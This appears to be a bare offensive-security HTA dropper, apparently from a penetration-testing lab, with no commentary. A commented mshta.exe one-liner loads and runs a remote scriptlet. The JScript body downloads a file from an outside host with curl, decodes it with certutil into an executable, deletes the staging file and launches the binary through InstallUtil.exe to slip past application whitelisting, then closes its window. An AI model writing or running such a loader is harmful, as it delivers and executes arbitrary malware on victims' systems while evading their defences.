# mshta.exe "javascript:a=(new ActiveXObject('WScript.Shell')).Run((GetObject('script:http://192.168.45.223/test.sct')).Exec(),0);close();"

<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe /c curl http://192.168.45.173/file.txt -o C:\\Users\\Public\\Documents\\file.txt && certutil -decode C:\\Users\\Public\\Documents\\file.txt C:\\Users\\Public\\Documents\\amit.exe && del C:\\Users\\Public\\Documents\\file.txt && C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Users\\Public\\Documents\\amit.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
